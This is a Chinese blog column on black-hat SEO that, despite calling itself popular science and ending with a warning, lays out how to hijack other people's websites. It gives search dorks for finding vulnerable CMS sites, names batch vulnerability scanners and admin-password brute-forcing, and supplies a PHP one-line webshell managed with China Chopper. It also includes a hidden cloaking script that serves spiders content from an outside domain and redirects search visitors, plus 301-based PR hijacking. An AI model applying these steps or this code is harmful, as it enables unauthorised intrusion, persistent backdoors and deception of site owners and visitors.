查看原文
其他

麻瓜专栏 | 有了黑帽SEO,人人都能做流量贩子(但最好不要)

2016-06-17 麻瓜君 艾奇SEM

点击关注▲艾奇SEM

知识 | 产品 | 资讯 | 职场 | 资源 5大版块

从SEM到互联网整合营销

瓜瓜只是科普

并不想教坏你们……

看到标题的时候,不知道你们什么感觉,是不是觉得麻瓜君一直在带坏你们,把你们引入黑暗的深渊呢?

我们的目的只是为了科普,探索我们不知道的东西而已,当然还是进入科普环节……

在互联网的世界里,其实流量劫持并不是什么件新鲜事。所谓流量劫持,无非就是指通过一定技术手段,控制你们的上网行为,让你们打开不想打开的网页,看到不想看的广告,当你们打开了之后,你们的行为就会给劫持者带去源源不断的收入。

什么意思呢?很简单。。。

明明打开的是www.magua12138.com网站,莫名其妙却被跳转至www.fzeme.com的网站;明明想下的是A软件,下载安装后却发现是B软件;还有打开一个App,弹出让人心乱如麻的广告,你们以为电脑手机中毒了?

我就呵呵了,错!或许你们真的错怪了病毒,因为这个时候你们的互联网流量很可能被劫持了。


尽管这种现象很早就存在,也有很多人杜绝或者厌恶,但在“用户就是小绵羊”的环境下,流量劫持始终“野火烧不尽,春风吹又生”。

到底谁在劫持流量?

流量劫持背后的“恶魔之手”究竟什么样?

根据《IT时报》记者调查发现,在互联网世界,流量劫持背后有一个庞大的灰色产业链,仅DNS劫持一种方式,每天被恶意劫持的流量至少有上千万个IP。

今天我们话题就围绕着“劫持”两个字,随便扯一扯……

劫持其实有很多,比如说什么,流量劫持、快照劫持、PR劫持等,其实前几个步骤都一样,就是最后的脚本不同而已……

我们按顺序来,因为是劫持别人的站,所以我们要做的第一步肯定是获取劫持站的后台权限,并留下后门,以便日后管理,这个过程就是常说的拿站(webshell)。

从难易度来说,最容易的就是企业站了,因为大多数的企业站都是采用开源系统,很多系统因本身的问题存在诸多安全隐患,比如虐心的dede(我们常用的织梦CMS)。

有些系统的漏洞已经曝光出来,找到这些漏洞的特征和这个漏洞对应的系统,然后去各种渠道搜集使用这个系统的网站,遍历扫描每个站,如果存在这个漏洞,就暴力破解后台账户名和密码。

收集目标网站,最简单的方法是拿漏洞的特征做关键词到搜索引擎去搜,然后把搜索结果页上的网站全部抓下来。熟悉网站的瓜友肯定对下面的关键词非常熟悉了比如说:

Powered by DEDECMS

inurl:HomeMarket.asp

有限公司--Powered by ASPCMS V2.0

用户登陆 inurl:admin/login.asp。。。还有XXX技术支持等等

然后拿抓下来以后就可以对这些网站去进行漏洞了,你们肯定一脸懵逼,是不是想问怎么扫描?

用很多现成的拿站工具可以完成批量的扫描和破解,然而每个工具不能能覆盖所有漏洞,所以需要交叉使用:

御剑后台扫描

wwwscan GUI版

web扫描工具-WVS

椰树WEB漏洞扫描器

Pker多线程后台极速扫描器

Web应用安全漏洞检测工具

Acunetix Web Vulnerability Scanner 8

如果过程顺利的话,就可以拿到一些网站的后台账户跟密码了,然后就可以正常登陆了。

这个时候你们就需要留一个后门,在网站后台新建一个php文件(用DW),写入一句话木马:<?php eval($_POST['ee']); ?>,通过菜刀(一个非常好用而又强大的webshell管理软件,如“中国菜刀”)添加shell,无异常的话就已经顺利的拿下一个站了。

接下来在后台写入劫持代码,比如要劫持首页,在后台找一个很隐蔽的地方新建一个php文件,写入类似的代码:

<?php

$httpuser=strtolower($_SERVER['HTTP_USER_AGENT']);

if(strstr($httpuser,'Baiduspider') or strstr($httpuser,'Googlebot') or strstr($httpuser,'Sogou web spider')){

    $url=‘http://www.magua121381.com';$a=file_get_contents($url);echo $a;exit;

}

$httpuser=strtolower($_SERVER['HTTP_REFERER']);

if(strstr($httpuser,'baidu') or strstr($httpuser,'google') or strstr($httpuser,'sogou')){

    $url=‘http://www.magua121382.com';header("Location:$url");exit;

}

?>

我们怎么去理解这句话呢?意思其实非常简单,大致可以这么理解,若蜘蛛来访,则抓取 www.magua121381.com的内容;若来路为搜索引擎,则返回www.magua121382.com的内容,然后上传到网站的根目录……

之后在首页文件index.php中调用刚才新建的文件:

<?php

include(“{新建文件的路径}")

?>

当然,www.magua121381.com 和 www.magua121382.com 可以设为同一个网址。(如果你们真这么设置,你们做那么多的目的是什么= =)

这就是快照劫持的简单步骤了,被劫持的站,对蜘蛛访问返回www.magua121381.com的内容,对从搜索引擎搜索过来的用户返回www.magua121382.com的内容,你如果输入网站的域名(网站url),则是本来的页面。一般负责网站管理的人,都只输入url访问网站,index.php也很少关注,所以好长时间才发现,甚至发现不了自己的网站被劫持。

有的时候在百度中搜索很多违禁的词语,会出现一堆政府的网站,但是点进去是却看到各种违禁内容(百度站长平台还专门开了一个“bad case”的帖子专门收集类似的案例),直接输入网址访问,却是正常的内容,若果换一个搜索词从百度点进去,还是正常的内容。这就是在刚才所说的劫持代码的基础上完成的,根据referer词来判断是否返回指定页面,现在百度已经取消referer参数了,所以这东西也就随之失效了,我们略过……

进入下一个环节,PR劫持,就是对蜘蛛301到指定的网站,(301就不特别解释了,301重定向的意思,自己上网查一下)从而提升权重。有些新站,做了不到1个月,用站长工具一查,哎哟我去,权重值都在4以上,但网站本身并没多少内容和收录,如果有看到这样的情况,基本是用了PR劫持了……

简单来说,PR值的计算是有周期的,假如A网站的PR值是4,B网站是0,我们把A网站劫持到B网站,在PR值计算过后,再取消劫持,那么B网站就拥有了4的PR值,至少能保持到下次计算的时候……

最后说一个快照劫持,因为最近看见的比较频繁且很少人知道,利用JS脚本来霸屏搜索引擎……

怎么做到的?脚本怎么写?

这样改变世界的做法你们真的认为很容易就能实现吗?

事实上的确很容易……用一些软件就可以了。

我们来看看这个软件的搜索跳转功能,支持各大搜索引擎,使从任意方式搜索出点击到你网站后,搜索网站页面自动跳转到指定的网站,自定义网站功能支持一级,多级,长尾域名格式。优化来路,默认百度,防止百度蜘蛛被k。

这软件还有一些奇特的功能,看图不说话……

手机也是可以的……

这个软件还真是丧心病狂阿。。。

建议很多玩搜索方面的瓜友如果是因为好奇,可以跟着麻瓜君的思路探索一下,但是如果是为了自己的公司,或者是自己所在的企业长远的考虑,建议不要运用以上任何一种手法,到时候别说我没提醒你们哦。

今天我们仅仅科普下劫持原理,还有很多的细节没有展开说,比如批量管理webshell,又比如说如何隐蔽踪迹。

如果藏的不是非常隐蔽,基本都会被发现,只是时间长短问题,且作上去的排名都活不了太长时间,而且会带来你意想不到的惩罚,说白了,能获得多大效果,取决于能铺多少量,是个耗费精力、时间的力气活,所以还是专心研究白帽SEO吧……

专栏作者:麻瓜君   关注公众号:麻瓜族(ID:magua12138)

原创投稿,未经授权请勿转载

投稿:710554356@qq.com

技术改变生活多学点东西才美妙

麻瓜君科(TU)普(CAO)系列,请点击阅读:

这就是爱 | 手把手教你做好百度知道营销

什么?这些搜索引擎竟然是国家队!

学会这9个搜索新技能 Get √,让你查资料快的飞起来!

我们来聊聊关于如何霸屏搜索引擎首页,以及它背后的故事……

比恶意点击还严重:一个至今都无法完全防御的网络攻击,DDoS……

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存